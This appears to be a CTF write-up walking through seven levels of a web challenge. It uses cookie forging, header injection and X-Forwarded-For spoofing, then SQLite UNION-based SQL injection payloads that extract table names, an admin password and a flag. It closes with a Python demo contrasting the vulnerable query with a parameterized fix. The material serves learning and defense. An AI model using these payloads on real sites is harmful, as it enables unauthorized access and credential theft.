Saturday, July 27, 2013

ctf.wargame.vn teaser round web100

This challenge is also quite simple; it only needs you to pay closer attention to what the server sends to and receives from your browser.
The hint the host gives us is:
There are 7 levels :) + Levels 6-7 use SQLite

Level 7: You have to guess what the query is :). Try %29 %22
Other levels: learn about PHP and Apache :).

In this challenge, I use only a web browser (Firefox or Iceweasel) with some add-ons, plus Burp Suite to modify requests before they are sent.
Let's start with the link:
http://challenges.wargame.vn:1337/web100_d6da263d82cd07bd02cecf82f2b666b7/

It works!..

At first glance, the website looks incomplete. Open the page source: there is nothing special in it, except that there is a vertical scroll bar. Scroll down to the bottom and a hidden level 2 link appears. This trick always catches some players.

Let's move on to level 2 with the link we found in the previous level.

You're not logged in!

WTF, why are we not logged in? There is no form for us to authenticate with, so there must be another way to make the server believe that we are logged in. One way to do this is with a cookie: we need to send a cookie to the server to tell it we are already logged in. Cookie Manager, a Firefox add-on, shows nothing; no cookie has been stored. Next, let's check what the server sends us using Live HTTP Headers, another Firefox add-on. (Thanks ML for this hint; I didn't even think that I needed to examine what the server sends because of my little CTF experience.)

Set-Cookie: login=0; expires=Thu, 01-Jan-1970 00:00:01 GMT

That explains why there is no cookie stored in our browser: the expiry date is in the past, so the browser discards the cookie immediately. The job is easy now: set the login cookie to 1 and send our request to the server to get the next level link.

In level 3, we do the same as in level 2, except that we set the login cookie to the IP address hidden in the page source of this level.

Level 4 is more challenging than the first 3 levels. Open the page source and we get an array of server variables and a hidden variable.

I have to guess that, to pass this level, we need to set the server variable HTTP_1337 to 1337.
To do this level, you need to understand what a server variable is and how it is derived from the request (http://www.php.net/manual/en/reserved.variables.server.php). PHP exposes each request header as a $_SERVER entry prefixed with HTTP_, so a header named 1337 becomes HTTP_1337.
Insert the following line into the request's HTTP headers before it is sent to the server:
1337:1337

Level 5 is similar to level 4. We need to change our IP address ($_SERVER['REMOTE_ADDR']) to 127.0.0.1, which seems impossible. A Google search turned up something interesting: http://en.wikipedia.org/wiki/X-Forwarded-For

Move on to the next level. This level is no longer a PHP trick; it requires SQL injection skill.
?id=1
Hello manhluat!

Try changing the value to see whether it is exploitable.
?id=1'
Nothing ...

So the parameter may be injectable. Try some more SQL injection:
id=-1 union select 1,1,1;--
Hello 1!

It works! Now it is time to exploit this level. We know this level uses SQLite, so we use the following query to get the table name:
?id=-1 union select 1,name,1 from sqlite_master WHERE type='table' ;--

Hello users!

We get the table users.

?id=-1 union select 1,username,1 from users ;--
Hello admin!

?id=-1 union select 1,password,1 from users where username='admin';--
Hello ....(level7 link)!

Following the link, we reach level 7. For this level, the host gives us a hint: try %22 and %29, which stand for the " and ) characters.


?id=-1
Hello!
?id=-1"
Nothing... -> There must be an error in the SQL query
?id=-1")
Nothing...
?id=-1");--
Hello!

OK, now we guess the query should be: select ... from ... where (id="xxx")

Let's do some more:
?id=-1") union select 1,1,1 where ("1"="1
Hello 1!

OK. Now we know how to pass this level. Do the same as in the previous level.
?id=-1") union select 1,name,1 from sqlite_master where ("1"="1

Hello flag!

?id=-1") union select 1,flag,1 from flag where ("1"="1

Done.
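
The level 7 probing above, replayed offline as an added example (not code from the challenge or from the original post): the guessed query shape select ... from ... where (id="xxx") built by string concatenation, next to a version that validates and binds the id. The column names, the rows, the PLACEHOLDER_FLAG value and the function names are assumptions; only the table names users and flag and the probe strings come from the write-up.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the challenge database. Only the table names
    # (users, flag) come from the write-up; columns and rows are assumed.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'manhluat', 'constructed-password');
        CREATE TABLE flag (flag TEXT);
        INSERT INTO flag VALUES ('PLACEHOLDER_FLAG');
    """)
    return db

def greet_vulnerable(db, raw_id):
    # Guessed level 7 shape: select ... from ... where (id="xxx").
    # The request value is pasted into the SQL text, so a ") closes the
    # quoted string and the parenthesis and lets input continue the statement.
    # Relies on SQLite's default acceptance of double-quoted string literals.
    sql = 'SELECT id, username, password FROM users WHERE (id="%s")' % raw_id
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:
        return "Nothing..."  # a syntax error shows up as the empty response
    return "Hello %s!" % row[1] if row else "Hello!"

def greet_safe(db, raw_id):
    # Hardened form: accept only an integer id and bind it as a parameter,
    # so the value can never be parsed as SQL syntax.
    try:
        user_id = int(raw_id)
    except ValueError:
        return "Hello!"
    row = db.execute("SELECT username FROM users WHERE (id = ?)",
                     (user_id,)).fetchone()
    return "Hello %s!" % row[0] if row else "Hello!"

if __name__ == "__main__":
    db = make_db()
    probes = ['1', '-1', '-1"', '-1")',
              '-1") union select 1,flag,1 from flag where ("1"="1']
    for p in probes:
        print("%-55s vulnerable: %-25s safe: %s"
              % (p, greet_vulnerable(db, p), greet_safe(db, p)))
```

The difference between "Hello!" and "Nothing..." in the vulnerable version is the same signal the probes above relied on; the bound version returns the same response for every malformed id.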
